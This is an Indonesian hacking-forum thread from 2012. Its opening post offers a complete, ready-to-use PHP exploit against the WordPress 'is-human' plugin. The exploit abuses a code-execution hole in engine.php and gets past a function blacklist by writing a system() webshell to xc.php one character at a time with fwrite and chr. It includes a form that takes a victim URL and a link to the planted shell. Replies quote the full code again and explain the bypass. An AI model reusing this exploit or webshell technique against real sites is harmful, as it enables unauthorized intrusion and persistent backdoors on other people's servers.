Threaded Mode | Linear Mode

Regel · 03-28-2012, 06:39 PM

Berikut contoh Exploitasi PHP Code excute dimana pada target reguest yg masuk di filter beberapa function php seperti encoder/decoder, system, dll.
saya telah mencoba jg menggunakan string dasar chr namun tetap di blacklist. simimin mungkin udah belajar

teknik exploitasi yg sebelumna. ini utk attak ke 3x lho.. ngakak

pikir dan berpikir akhirnya saya mencoba satu2 beberapa function php,, ternyata ada msh ada function yg tidak difilter yakni fwrite. kemudian saya mencoba bikin function fwrite namun gagal jg. kemudian saya test menulis bebrapa kata tanpa sintax. berhasil. smangat

Kesimpulan Jika bukan sintax php work
jadi bagaimana cara menulis file phpshell ke target Silahkan Pahami code RCE berikut:

PHP Code:

<?php

/**
 * @author BlueBoyz
 * @copyright 2012 Www.ExploreCrew.Org
 * @version 11.3.2
 * @tutorial Alternative Remote Code Execution Vulnerability
 * @for education purphose only
 */


# <!-- start:function grabing -->
function jHTTP($languagge='en_gb', $method='POST',$url,$data){
    $header = array('Accept-Language: '.$languagge.',en-us;q=0.7,en;q=0.3' );
    $ch = curl_init();   
    if ($method == 'POST'){
        curl_setopt($ch, CURLOPT_URL,$url);
        curl_setopt($ch, CURLOPT_POST, TRUE );
        curl_setopt($ch, CURLOPT_POSTFIELDS,$data );
    }elseif($method == 'GET'){
        curl_setopt($ch, CURLOPT_URL,$url.''.$data);
    }elseif($method == 'UPLOAD'){
        curl_setopt($ch, CURLOPT_URL,$url);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);       
    }
    curl_setopt($ch, CURLOPT_REFERER, $url);

    curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt');    
    
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);      
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0');
    curl_setopt($ch, CURLOPT_HTTPHEADER,$header) ;
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    return curl_exec($ch);
    curl_close($ch);    
}
# <!-- end:function grabing -->


if(isset($_POST['exp'])){
    
    #mengambil link victim dari form, kemudian ditambah bug + prefix code [xcrew].    
    $victim =$_POST['victim'].'/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options;[excute];error';
    
    #kita membuat perintah untuk menulis file xc.php dengan str <?php system($_GET['x']);
    $exploit = array (
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)", // menulis = < 
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// menulis = ? 
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)", // menulis = php 
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)", // menulis spasi
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)", // menulis system
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)", // menulis (
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)", // menulis $
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)", // menulis _GET
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)", // menulis [
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis '
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)", // menulis x
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis '
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)", // menulis ]
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)", // menulis )
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // menulis ;
        // semuanya klw digabungin menjadi <?php system($_GET['x']);
    );
    
    #looping array di atas
    for($i=0;$i<count($exploit);$i++){
        #tukar prefix [xcrew] tersebut dengan yg didalam array
        $link = str_replace('[xcrew]',$exploit[$i],$victim);
        jHTTP($languagge='en_gb', 'GET',$link,'');
    }
    $info = '<a href="'.$_POST['victim'].'/wp-content/plugins/is-human/xc.php?x=uname -a">Go to Shell</a>';
}
#membuat form HTML nya

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
    <meta name="author" content="BlueBoyz" />
    <title>Exploit IS Human</title>
</head>
<body>
<form method="post" action="" >
<input type="text" name="victim" size="100" /> eg: http://webvictim.com/wordpress/ <br />
<input type="submit" name="exp" />
</form>
<?php echo @$info ?>
</body>
</html> 

**chaer.newbie** · 03-28-2012, 06:43 PM

wah keren

**DnA19** · 03-28-2012, 07:10 PM

izin

dulu ya 0mz...
smangat

noe · 03-28-2012, 07:12 PM

masih bingung aku, tapi ijin belajar

dlu, cpa tau dapat pncerahanx kaget

tapi bisa mnta toturialx ngagan ketawa

Regel · 03-28-2012, 08:25 PM

tq cendol nya gan,,

(03-28-2012 07:12 PM)noe Wrote: masih bingung aku, tapi ijin dlu, cpa tau dapat pncerahanx
tapi bisa mnta toturialx ngagan

coba perhatikan source diatas ada php commenternya.. yg diawalnya dikasih tanda #, // atw * itu lho.

misal kita pengen menulis

Code:

<?php system($_GET['x']);

klw ditulis langsung,, diblok security karna ada sintax php.
jadi untuk bypass itu,, dgn memakai fwrite dgn option a+, kata2 tersbut dipisah,, excute pertama membuat tulisan <, kedua ?, ketiga php, dst...

Code:

$exploit = array (

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)", // menulis = < 

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// menulis = ? 

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)", // menulis = php 

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)", // menulis spasi

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)", // menulis system

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)", // menulis (

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)", // menulis $

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)", // menulis _GET

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)", // menulis [

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis '

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)", // menulis x

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis '

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)", // menulis ]

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)", // menulis )

        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // menulis ;

        // semuanya klw digabungin menjadi <?php system($_GET['x']);

    );

gitu deh POC nya

noe · (This post was last modified: 03-28-2012 09:01 PM by noe.)

(03-28-2012 08:25 PM)Regel Wrote: tq cendol nya gan,,

(03-28-2012 07:12 PM)noe Wrote: masih bingung aku, tapi ijin dlu, cpa tau dapat pncerahanx
tapi bisa mnta toturialx ngagan

coba perhatikan source diatas ada php commenternya.. yg diawalnya dikasih tanda #, // atw * itu lho.

misal kita pengen menulis

Code:

<?php system($_GET['x']);
klw ditulis langsung,, diblok security karna ada sintax php.
jadi untuk bypass itu,, dgn memakai fwrite dgn option a+, kata2 tersbut dipisah,, excute pertama membuat tulisan <, kedua ?, ketiga php, dst...

Code:

$exploit = array ( "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)", // menulis = < "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// menulis = ? "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)", // menulis = php "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)", // menulis spasi "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)", // menulis system "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)", // menulis ( "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)", // menulis $ "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)", // menulis _GET "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)", // menulis [ "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis ' "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)", // menulis x "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis ' "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)", // menulis ] "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)", // menulis ) "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // menulis ; // semuanya klw digabungin menjadi <?php system($_GET['x']); );

gitu deh POC nya

ko aku ngga kpikir sama sekali ya kaget

wah ijin Ctrl D dlu buat pnympurna'n mantap

makasih om, mantap neh cium

bisa neh buat bahan tugas ntar whawha ngakak

anharku · 03-28-2012, 10:14 PM

hm... belajar ah.... belajar

dzawa · 03-28-2012, 10:35 PM

om keren.. Haha

ph0eniXb0y · 03-28-2012, 11:15 PM

belajar dolo ah bang, masih belum ngerti beginian :)

ZGOM · 03-28-2012, 11:56 PM

(03-28-2012 06:39 PM)Regel Wrote: Berikut contoh Exploitasi PHP Code excute dimana pada target reguest yg masuk di filter beberapa function php seperti encoder/decoder, system, dll.
saya telah mencoba jg menggunakan string dasar chr namun tetap di blacklist. simimin mungkin udah teknik exploitasi yg sebelumna. ini utk attak ke 3x lho..
pikir dan berpikir akhirnya saya mencoba satu2 beberapa function php,, ternyata ada msh ada function yg tidak difilter yakni fwrite. kemudian saya mencoba bikin function fwrite namun gagal jg. kemudian saya test menulis bebrapa kata tanpa sintax. berhasil.
Kesimpulan Jika bukan sintax php work
jadi bagaimana cara menulis file phpshell ke target Silahkan Pahami code RCE berikut:

PHP Code:

<?php /** * @author BlueBoyz * @copyright 2012 Www.ExploreCrew.Org * @version 11.3.2 * @tutorial Alternative Remote Code Execution Vulnerability * @for education purphose only */ #  function jHTTP($languagge='en_gb', $method='POST',$url,$data){ $header = array('Accept-Language: '.$languagge.',en-us;q=0.7,en;q=0.3' ); $ch = curl_init(); if ($method == 'POST'){ curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, TRUE ); curl_setopt($ch, CURLOPT_POSTFIELDS,$data ); }elseif($method == 'GET'){ curl_setopt($ch, CURLOPT_URL,$url.''.$data); }elseif($method == 'UPLOAD'){ curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0'); curl_setopt($ch, CURLOPT_HTTPHEADER,$header) ; curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); return curl_exec($ch); curl_close($ch); } #  if(isset($_POST['exp'])){ #mengambil link victim dari form, kemudian ditambah bug + prefix code [xcrew]. $victim =$_POST['victim'].'/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options;[excute];error'; #kita membuat perintah untuk menulis file xc.php dengan str <?php system($_GET['x']); $exploit = array ( "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)", // menulis = < "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// menulis = ? "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)", // menulis = php "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)", // menulis spasi "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)", // menulis system "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)", // menulis ( "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)", // menulis $ "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)", // menulis _GET "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)", // menulis [ "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis ' "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)", // menulis x "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // menulis ' "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)", // menulis ] "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)", // menulis ) "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // menulis ; // semuanya klw digabungin menjadi <?php system($_GET['x']); ); #looping array di atas for($i=0;$i<count($exploit);$i++){ #tukar prefix [xcrew] tersebut dengan yg didalam array $link = str_replace('[xcrew]',$exploit[$i],$victim); jHTTP($languagge='en_gb', 'GET',$link,''); } $info = '<a href="'.$_POST['victim'].'/wp-content/plugins/is-human/xc.php?x=uname -a">Go to Shell</a>'; } #membuat form HTML nya ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <meta name="author" content="BlueBoyz" /> <title>Exploit IS Human</title> </head> <body> <form method="post" action="" > <input type="text" name="victim" size="100" /> eg: http://webvictim.com/wordpress/ <br /> <input type="submit" name="exp" /> </form> <?php echo @$info ?> </body> </html>

wih om yg satu ini emang ganteng ijin pelajari om GANTENG belajar

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Tutor] Remote Command Excute Ala newbie	Regel	6	216	03-27-2013 04:35 PM Last Post: abuabu_hat10
	[Tutor] Joomla Remote Shell Upload Vulnerability	panjidani	3	256	02-18-2013 03:01 PM Last Post: eidelweiss
	[Tutor] Command Execution Vulnerability	wenkhairu	24	1,212	05-06-2012 11:26 AM Last Post: chaer.newbie
	Share source code hacker	jackerp	13	938	03-30-2012 12:49 AM Last Post: rudaz25
	[Tutor] Menemukan Backdoor dan malicious code pada server	wenkhairu	17	665	02-29-2012 02:45 PM Last Post: rokimpot
	[Ask] Simple question about batch code	zaqquater	2	104	02-14-2012 02:58 PM Last Post: zaqquater
	[Tutor] phpLDAPadmin <= 1.2.1.1 Remote Code Eexcution	p0pc0rn	19	442	12-30-2011 04:13 PM Last Post: p0pc0rn
	[Tutor] RCE (Remote Command Execute) Ajaxfilemanager	eidelweiss	17	397	11-20-2011 03:55 PM Last Post: Wayc0de
	[Tutor] Remote Dekstop memantau kopn jarak jauh	monokurobo	20	558	10-24-2011 02:20 AM Last Post: ZerO_bRuN
	[Ask] om Tolong Pecahin Code ini	aLdyJrz	7	199	08-25-2011 03:58 PM Last Post: jerry0503222